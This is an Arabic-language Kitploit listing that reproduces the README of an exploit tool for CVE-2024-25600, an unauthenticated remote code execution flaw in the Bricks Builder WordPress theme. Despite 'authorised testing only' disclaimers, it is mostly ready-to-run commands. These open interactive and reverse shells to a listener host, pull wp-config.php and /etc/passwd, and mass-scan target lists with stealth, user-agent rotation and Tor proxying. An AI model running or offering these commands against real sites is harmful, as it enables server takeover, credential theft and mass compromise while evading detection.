Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
WP-Bricks-Exploit-CVE-2024-25600 — CVE-2024-25600 - استغلال RCE غير مصادق عليه لقالب Bricks Builder في WordPress. إطار استغلال متقدم مع صدفة تفاعلية، وصدفات عكسية، ورفع/تنزيل ملفات، وفحص غير متزامن، ووضع التخفي، ودعم بروكسي، وفحص ثغرات متعدد الخيوط. للاختبار الأمني المصرح به فقط. | Kitploit
أدوات/GitHubGitHub/cerberusmrxi/wp-bricks-exploit-cve-2024-25600
الاستطلاعماسحات الثغرات الأمنيةالاستغلالشيل كوداستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقالقيادة والسيطرةالفريق الأحمر

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
تطوير الحمولات
GitHubcerberusmrxi/wp-bricks-exploit-cve-2024-25600

WP-Bricks-Exploit-CVE-2024-25600

CVE-2024-25600 - استغلال RCE غير مصادق عليه لقالب Bricks Builder في WordPress. إطار استغلال متقدم مع صدفة تفاعلية، وصدفات عكسية، ورفع/تنزيل ملفات، وفحص غير متزامن، ووضع التخفي، ودعم بروكسي، وفحص ثغرات متعدد الخيوط. للاختبار الأمني المصرح به فقط.

عرض المستودع
11منذ شهر واحدلم تتم المراجعة بعد

أداة استغلال BricksRCE

CVE-2024-25600 — ثغرة تنفيذ أوامر عن بعد غير مصادق عليها في قالب ووردبريس Bricks Builder

Python Version CVSS CVE License Platform

أداة تقييم أمني معتمدة لـ CVE-2024-25600
المؤلف: Sudeepa Wanigarathna · الأداة: BricksRCE Exploiter v1.0
السكربت الرئيسي: cve-2024-25600.py

b

[!IMPORTANT] للاستخدام المصرح به فقط. هذه الأداة مخصصة للبحث الأمني والتعليم واختبار الأنظمة التي تملكها أو لديك إذن كتابي صريح لتقييمها. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني. لا يتحمل المؤلف أي مسؤولية عن سوء الاستخدام.


جدول المحتويات

  • نظرة عامة
  • تفاصيل الثغرة
  • الميزات
  • التثبيت
  • بداية سريعة
  • دليل الاستخدام
  • مرجع الأوامر
  • الصدفة التفاعلية
  • المخرجات والتسجيل
  • استكشاف الأخطاء
  • هيكل المستودع
  • سجل الإصدارات
  • إخلاء المسؤولية
  • المؤلف والإسناد
  • الترخيص

نظرة عامة

CVE-2024-25600 هي ثغرة حرجة لتنفيذ أوامر عن بعد غير مصادق عليها في قالب ووردبريس Bricks Builder. يؤدي التعامل غير السليم مع المدخلات التي يتحكم بها المستخدم في نقطة نهاية REST الخاصة بـ render_element إلى السماح للمهاجمين غير المصادق عليهم بتنفيذ أوامر PHP/نظام عشوائية على التركيبات المتأثرة.

BricksRCE Exploiter (cve-2024-25600.py) هي أداة تقييم بايثون كاملة الميزات لمتخصصي الأمن المصرح لهم من أجل:

  • اكتشاف تركيبات Bricks Builder المعرضة للخطر
  • التحقق من التأثير من خلال تنفيذ أوامر خاضعة للتحكم
  • التفاعل مع المضيفين المخترقين عبر صدفة تفاعلية
  • المسح الجماعي لقوائم الأهداف باستخدام عمال غير متزامنين/مترابطين
  • تصدير النتائج المنظمة للتقارير

تفاصيل الثغرة

نقاط النهاية المتأثرة

نقطة النهايةالطريقة
/wp-json/bricks/v1/render_elementPOST
/?rest_route=/bricks/v1/render_elementPOST

ملخص الهجوم

  1. استخراج nonce من Bricks من شفرة مصدر الصفحة المستهدفة
  2. إرسال طلب render_element مصمم بحمولة عنصر ضارة
  3. يؤدي تقييم الكود من جانب الخادم إلى تنفيذ أوامر عشوائية

المراجع

  • CVE-2024-25600 (MITRE)
  • إدخال NVD
  • سجل تغييرات Bricks Builder / النشرة الأمنية

الميزات

القدرات الأساسية

عناصر التحكم التشغيلية

إعداد التقارير

القدرةالوصف
تصدير JSON / TXTحفظ نتائج المسح والأهداف المعرضة للخطر
سجل الأوامرتسجيل اختياري للأوامر المنفذة
تسجيل الملفاتسجل مستمر bricks_rce.log بالإضافة إلى مسارات سجل مخصصة

التثبيت

المتطلبات الأساسية

  • Python 3.8+
  • pip
  • إمكانية الوصول الشبكي إلى الأهداف المصرح بها

الإعداد

root@kitploit:~
git clone https://github.com/CerberusMrXi/WP-Bricks-Exploit-CVE-2024-25600.git
cd WP-Bricks-Exploit-CVE-2024-25600

python3 -m venv venv
source venv/bin/activate          # Windows: venv\Scripts\activate

pip install -r requirements.txt

python3 cve-2024-25600.py --help

التبعيات

root@kitploit:~
requests>=2.31.0
aiohttp>=3.9.0
beautifulsoup4>=4.12.0
lxml>=4.9.0
prompt-toolkit>=3.0.0
rich>=13.7.0
pysocks>=1.7.0          # اختياري — دعم وكيل SOCKS5

بداية سريعة

استبدل https://target.example بهدف مختبر أو مصرح به فقط.

root@kitploit:~
# صدفة تفاعلية
python3 cve-2024-25600.py -u https://target.example

# أمر واحد
python3 cve-2024-25600.py -u https://target.example --cmd "id"

# مسح جماعي
python3 cve-2024-25600.py -f targets.txt -t 20 -o results.json

# كشف الإصدار
python3 cve-2024-25600.py -u https://target.example --detect-version

# عبر وكيل Burp
python3 cve-2024-25600.py -u https://target.example --proxy http://127.0.0.1:8080 -v

دليل الاستخدام

جميع الأمثلة تستخدم السكربت الرئيسي: cve-2024-25600.py

1. إظهار المساعدة

root@kitploit:~
python3 cve-2024-25600.py --help

2. صدفة تفاعلية لهدف واحد

تفتح صدفة RCE تفاعلية بعد تأكيد أن الهدف معرض للخطر.

root@kitploit:~
python3 cve-2024-25600.py -u https://target.example

سير العمل:

  1. توحيد شكل URL والتحقق من صحته
  2. استخراج nonce من الصفحة
  3. التحقق من الثغرة (إلا إذا تم استخدام --force)
  4. الدخول إلى صدفة تفاعلية

3. تنفيذ أمر واحد

root@kitploit:~
python3 cve-2024-25600.py -u https://target.example --cmd "whoami"

حفظ مخرجات الأمر في ملف:

root@kitploit:~
python3 cve-2024-25600.py -u https://target.example --cmd "id" --save-output

4. اختيار نوع الحمولة

root@kitploit:~
# الحمولة الافتراضية القائمة على استثناء PHP
python3 cve-2024-25600.py -u https://target.example --cmd "uname -a" --payload php

# الحمولة القائمة على system()
python3 cve-2024-25600.py -u https://target.example --cmd "uname -a" --payload system

5. كشف إصدار Bricks Builder

root@kitploit:~
python3 cve-2024-25600.py -u https://target.example --detect-version

دمجه مع أمر:

root@kitploit:~
python3 cve-2024-25600.py -u https://target.example --detect-version --cmd "id"

6. استخراج wp-config.php

root@kitploit:~
python3 cve-2024-25600.py -u https://target.example --extract-wp-config

يتم حفظه كـ wp-config_<target>.txt في حالة النجاح.

7. الصداف العكسية (مختبر مصرح به فقط)

root@kitploit:~
# الطرفية 1 — المستمع
nc -lvnp 4444

# الطرفية 2 — صدفة عكسية bash
python3 cve-2024-25600.py -u https://target.example \
  --reverse-shell bash \
  --lhost 10.0.0.5 \
  --lport 4444

جميع أنواع الصداف العكسية المدعومة:

root@kitploit:~
python3 cve-2024-25600.py -u https://target.example --reverse-shell bash   --lhost 10.0.0.5 --lport 4444
python3 cve-2024-25600.py -u https://target.example --reverse-shell nc     --lhost 10.0.0.5 --lport 4444
python3 cve-2024-25600.py -u https://target.example --reverse-shell python --lhost 10.0.0.5 --lport 4444
python3 cve-2024-25600.py -u https://target.example --reverse-shell php    --lhost 10.0.0.5 --lport 4444
python3 cve-2024-25600.py -u https://target.example --reverse-shell perl   --lhost 10.0.0.5 --lport 4444
python3 cve-2024-25600.py -u https://target.example --reverse-shell ruby   --lhost 10.0.0.5 --lport 4444

8. وضع القوة (تخطي فحص الثغرة)

root@kitploit:~
python3 cve-2024-25600.py -u https://target.example --force --cmd "uname -a"

9. المسح الجماعي من ملف

root@kitploit:~
# targets.txt — رابط واحد في كل سطر
python3 cve-2024-25600.py -f targets.txt

مع الخيوط، التأخير، التخفي، ومخرجات JSON:

root@kitploit:~
python3 cve-2024-25600.py -f targets.txt \
  -t 15 \
  --delay 0.5 \
  --stealth \
  -o vulnerable.json

المسح المتزامن (تجمع خيوط) بدلاً من غير المتزامن:

root@kitploit:~
python3 cve-2024-25600.py -f targets.txt --sync -t 10 -o results.txt

مسح جماعي صامت:

root@kitploit:~
python3 cve-2024-25600.py -f targets.txt -q -o results.json

10. اختيار نقطة النهاية

root@kitploit:~
# كلا نقطتي النهاية (الافتراضي)
python3 cve-2024-25600.py -u https://target.example --endpoint both

# فقط /wp-json/bricks/v1/render_element
python3 cve-2024-25600.py -u https://target.example --endpoint json

# فقط /?rest_route=/bricks/v1/render_element
python3 cve-2024-25600.py -u https://target.example --endpoint rest_route

11. وضع التخفي

root@kitploit:~
python3 cve-2024-25600.py -u https://target.example \
  --stealth \
  --delay 1.0 \
  --max-retries 5 \
  --timeout 20

12. User-Agent مخصص

root@kitploit:~
# UA مخصص
python3 cve-2024-25600.py -u https://target.example \
  --user-agent "Mozilla/5.0 (compatible; SecurityScanner/1.0)"

# تعطيل تدوير UA العشوائي
python3 cve-2024-25600.py -u https://target.example --no-random-ua

13. دعم الوكيل

root@kitploit:~
# وكيل HTTP (مثل Burp Suite)
python3 cve-2024-25600.py -u https://target.example --proxy http://127.0.0.1:8080 -v

# وكيل SOCKS5
python3 cve-2024-25600.py -u https://target.example --proxy socks5://127.0.0.1:9050

# SOCKS5h (DNS عبر الوكيل / Tor)
python3 cve-2024-25600.py -u https://target.example --proxy socks5h://127.0.0.1:9050

14. التحقق من SSL

root@kitploit:~
# تمكين التحقق من شهادة SSL (معطل افتراضياً)
python3 cve-2024-25600.py -u https://target.example --verify-ssl

15. المخرجات والتسجيل

root@kitploit:~
# حفظ نتائج المسح كـ JSON
python3 cve-2024-25600.py -f targets.txt -o results.json

# حفظ نتائج المسح كـ TXT
python3 cve-2024-25600.py -f targets.txt -o results.txt

# ملف سجل تطبيق مخصص
python3 cve-2024-25600.py -u https://target.example --log-file assessment.log -v

# تسجيل الأوامر المنفذة
python3 cve-2024-25600.py -u https://target.example --command-log commands.log --cmd "id"

16. الأوضاع المفصلة والصامتة

root@kitploit:~
# تسجيل مفصل / تصحيح
python3 cve-2024-25600.py -u https://target.example -v

# وضع صامت (مخرجات قليلة)
python3 cve-2024-25600.py -u https://target.example -q --cmd "id"

17. ضبط الأداء

root@kitploit:~
python3 cve-2024-25600.py -f targets.txt \
  -t 25 \
  --timeout 20 \
  --delay 0.2 \
  --max-retries 5 \
  -o results.json

18. مثال تقييم كامل مشترك

root@kitploit:~
python3 cve-2024-25600.py -u https://target.example \
  --detect-version \
  --extract-wp-config \
  --stealth \
  --delay 0.8 \
  --timeout 20 \
  --max-retries 5 \
  --endpoint both \
  --proxy http://127.0.0.1:8080 \
  --log-file bricks_assessment.log \
  --command-log commands.log \
  -v

19. أوامر الصدفة التفاعلية المضمنة

بعد البدء باستخدام -u (بدون --cmd / --reverse-shell):

root@kitploit:~
Shell> whoami
Shell> id
Shell> pwd
Shell> ls -la
Shell> help
Shell> clear
Shell> download /etc/passwd
Shell> upload ./local.txt /tmp/remote.txt
Shell> php id
Shell> system uname -a
Shell> exit

مرجع الأوامر

خيارات الهدف

الوسيطالوصف
-u, --urlURL هدف واحد
-f, --fileملف يحتوي على URLs الأهداف (واحد في كل سطر)

خيارات المسح

خيارات التخفي

خيارات الاستغلال

خيارات المخرجات


الصدفة التفاعلية

عند استغلال هدف واحد بدون --cmd أو --reverse-shell، تفتح صدفة تفاعلية:

root@kitploit:~
Shell> whoami
www-data

Shell> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Shell> help

الأوامر المضمنة

الميزات

  • سجل الأوامر محفوظ في ~/.bricks_rce_history
  • الإكمال التلقائي للأوامر الشائعة
  • اقتراحات تلقائية من السجل (prompt-toolkit)

المخرجات والتسجيل

وحدة التحكم

لوحات مدعومة بـ Rich، أشرطة تقدم، وجداول نتائج:

root@kitploit:~
[*] Testing: https://target.example
[+] https://target.example is vulnerable!
[+] Interactive shell opened successfully

جدول نتائج المسح

تصدير JSON (-o results.json)

root@kitploit:~
{
  "timestamp": "2026-07-17T01:30:00",
  "version": "1.0.0",
  "config": {
    "threads": 10,
    "timeout": 15,
    "delay": 0.5
  },
  "stats": {
    "processed": 100,
    "vulnerable": 3,
    "failed": 97
  },
  "vulnerable_targets": [
    {
      "url": "https://target.example",
      "timestamp": "2026-07-17T01:31:12"
    }
  ]
}

ملفات السجل

الملفالغرض
bricks_rce.logسجل تطبيق إضافي افتراضي (إلحاق دائم)
--log-file PATHمعالج سجل مخصص إضافي
--command-log PATHسجل تدقيق الأوامر المنفذة

استكشاف الأخطاء

سير عمل التصحيح

root@kitploit:~
# فحص هدف واحد مفصل
python3 cve-2024-25600.py -u https://target.example --detect-version -v

# عبر Burp لفحص الطلب
python3 cve-2024-25600.py -u https://target.example \
  --proxy http://127.0.0.1:8080 -v --cmd "id"

# تفضيل نقطة نهاية محددة
python3 cve-2024-25600.py -u https://target.example --endpoint json -v

هيكل المستودع

root@kitploit:~
exploit/
├── cve-2024-25600.py     # BricksRCE Exploiter (v1.0)
├── requirements.txt      # تبعيات بايثون
├── README.md             # هذا الملف
├── bricks_rce.log        # سجل وقت التشغيل (يتم إنشاؤه)
└── venv/                 # بيئة افتراضية محلية (اختياري، غير مدرجة)

سجل الإصدارات

v1.0.0 — الإصدار الأولي

  • اكتشاف واستغلال RCE غير مصادق عليه لـ CVE-2024-25600
  • استخراج nonce متعدد الطرق
  • صدفة تفاعلية مع رفع / تنزيل
  • أوضاع الأمر الواحد والصدفة العكسية
  • مسح جماعي غير متزامن / مترابط
  • كشف الإصدار واستخراج wp-config
  • وضع التخفي، تدوير UA، دعم الوكيل
  • واجهة سطر أوامر غنية مع تصدير نتائج JSON/TXT

إخلاء المسؤولية

يتم توفير هذا المشروع كما هو لأغراض البحث الأمني الدفاعي واختبار الاختراق المصرح به.

باستخدام هذه البرمجية، فإنك توافق على ما يلي:

  1. ستستهدف فقط الأنظمة التي تملكها أو المصرح لك باختبارها صراحة.
  2. أنك تفهم قوانين إساءة استخدام الكمبيوتر وحماية البيانات المعمول بها.
  3. المؤلف والمساهمون ليسوا مسؤولين عن الضرر أو فقدان البيانات أو العواقب القانونية الناتجة عن سوء الاستخدام.

إذا اكتشفت هذه الثغرة في بيئات إنتاج لا تملكها، فاتبع ممارسات الإفصاح المسؤولة وتنسق مع مالك الموقع / فريق أمان Bricks Builder.

الوصول غير المصرح به إلى أنظمة الكمبيوتر هو جريمة فيدرالية.


المؤلف والإسناد


الترخيص

root@kitploit:~
MIT License

Copyright (c) 2024–2026 Sudeepa Wanigarathna

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.

الدعم

  • ضع نجمة للمستودع إذا ساعدك في أبحاثك المصرح بها
  • افتح مشكلة للأخطاء أو الإيجابيات الخاطئة أو تحسينات الكشف
  • نرحب بطلبات السحب للوثائق وتجربة المستخدم في المختبرات المصرح بها

لاختبار الأمن المصرح به فقط.

تنزيل الأداة
السمةالقيمة
معرف CVECVE-2024-25600
CVSS9.8 (حرجة)
متجه الهجومشبكة — غير مصادق عليها
التأثيرتنفيذ أوامر عن بعد بالكامل، اختراق السرية / التكامل / التوفر
المنتج المتأثرقالب ووردبريس Bricks Builder
الإصدارات المتأثرةBricks ≤ 1.9.6 (تم التصحيح في 1.9.6.1+)
نوع الثغرةتنفيذ أوامر عن بعد غير مصادق عليها
CWECWE-94 (التحكم غير السليم في توليد الكود)
القدرةالوصف
اكتشاف الثغرةتأكيد RCE من خلال فحص قائم على مؤشر خاضع للتحكم
استخراج nonceاكتشاف nonce متعدد الطرق (البرامج النصية، شفرة المصدر، البيانات الوصفية، REST)
كشف الإصدارتحديد إصدار Bricks Builder من CSS / readme / REST
صدفة تفاعليةREPL كامل مع السجل والإكمال التلقائي ونقل الملفات
وضع الأمر الواحدتنفيذ أمر واحد والخروج (مناسب للنصوص البرمجية)
مساعدات الصدفة العكسيةتوليد صدفة عكسية bash / nc / Python / PHP / Perl / Ruby
استخراج wp-configمحاولة تحديد موقع وقراءة wp-config.php
المسح الجماعيمسح متعدد الأهداف غير متزامن أو مترابط من قائمة URLs
القدرةالوصف
تحديد المعدلتأخير قابل للتكوين بين الطلبات
منطق إعادة المحاولةتراجع أسي في حالات المهلة وأخطاء الاتصال
تدوير User-Agentبصمات متصفح عشوائية لكل طلب
وضع التخفيرؤوس Accept-Language / Accept-Encoding عشوائية
دعم الوكيلHTTP, HTTPS, SOCKS5 / SOCKS5h
نقاط نهاية مزدوجةتفضيل wp-json, rest_route، أو كليهما
وضع القوةتخطي الفحص المسبق ومحاولة الاستغلال مباشرة
واجهة سطر أوامر غنيةأشرطة تقدم، جداول، لوحات ملونة عبر Rich
الوسيطالافتراضيالوصف
-t, --threads10العمال المتزامنون للمسح الجماعي
--delay0.5التأخير بين الطلبات (بالثواني)
--timeout15مهلة طلب HTTP (بالثواني)
--max-retries3عدد محاولات إعادة المحاولة عند الفشل
--forceغير مفعلتخطي فحص الثغرة
--syncغير مفعلاستخدام تجمع خيوط بدلاً من غير المتزامن
الوسيطالوصف
--user-agentسلسلة User-Agent مخصصة
--no-random-uaتعطيل تدوير User-Agent
--proxyURL الوكيل (http://, https://, socks5://, socks5h://)
--stealthتمكين وضع التخفي (رؤوس عشوائية + تأخيرات)
--endpointjson | rest_route | both (الافتراضي: both)
الوسيطالوصف
--cmdتنفيذ أمر واحد والخروج
--payloadنوع الحمولة: php (الافتراضي) أو system
--reverse-shellنوع الصدفة: bash, nc, python, php, perl, ruby
--lhostمضيف المستمع للصدفة العكسية
--lportمنفذ المستمع للصدفة العكسية
--extract-wp-configمحاولة استخراج wp-config.php
--detect-versionكشف إصدار Bricks Builder
--save-outputحفظ مخرجات الأمر الواحد في ملف
الوسيطالوصف
-o, --outputملف النتائج (.json أو .txt)
--log-fileمسار سجل مفصل مخصص
--command-logتسجيل الأوامر المنفذة في ملف
-v, --verboseتسجيل التصحيح
-q, --quietمخرجات وحدة تحكم قليلة
--verify-sslتمكين التحقق من شهادة SSL (معطل افتراضياً)
الأمرالوصف
exitالخروج من الصدفة
helpإظهار المساعدة
clearمسح الشاشة
download [remote]تنزيل ملف عن بعد (نقل base64)
upload [local] [remote]رفع ملف محلي إلى الهدف
php [cmd]التنفيذ عبر حمولة PHP (الافتراضي)
system [cmd]التنفيذ عبر حمولة system()
المقياسالوصف
إجمالي المعالجURLs التي تم مسحها
ناجحمؤكد تعرضها للخطر
فاشلغير معرضة / غير قابلة للوصول
معرضة وجدتعدد أهداف RCE المؤكدة
الأوامر المنفذةإجمالي مرات تشغيل أوامر RCE
الوقت المنقضيمدة المسح بالوقت الحقيقي
العَرَضما يجب محاولته
عدم العثور على nonceتأكد من أن Bricks نشط؛ حاول -v؛ تأكد من تحميل الصفحة الأمامية
الهدف غير معرض للخطرتحقق من أن Bricks ≤ 1.9.6؛ حاول --force؛ تحقق من كلا نقطتي النهاية
مهلات الاتصالارفع --timeout / --max-retries؛ تحقق من الوكيل
تحديد المعدل (429)زد --delay؛ فعّل --stealth
أخطاء SSLالافتراضي يتخطى التحقق؛ استخدم --verify-ssl فقط عند الحاجة
عدم استقرار غير المتزامناستخدم --sync للمسح المترابط
فشل الصدفة العكسيةتأكد من أن المستمع قيد التشغيل؛ جرب أنواع الصدف البديلة (python, nc)
مخرجات أمر فارغةربما نجح الأمر بدون مخرجات قياسية؛ جرب echo test
عدم العثور على wp-configتختلف المسارات حسب المضيف؛ استخدم الصدفة التفاعلية مع find / cat مخصص
الدورالاسم
مؤلف الأداةSudeepa Wanigarathna
CVECVE-2024-25600
الأداةBricksRCE Exploiter v1.0
السكربت الرئيسيcve-2024-25600.py
الترخيصMIT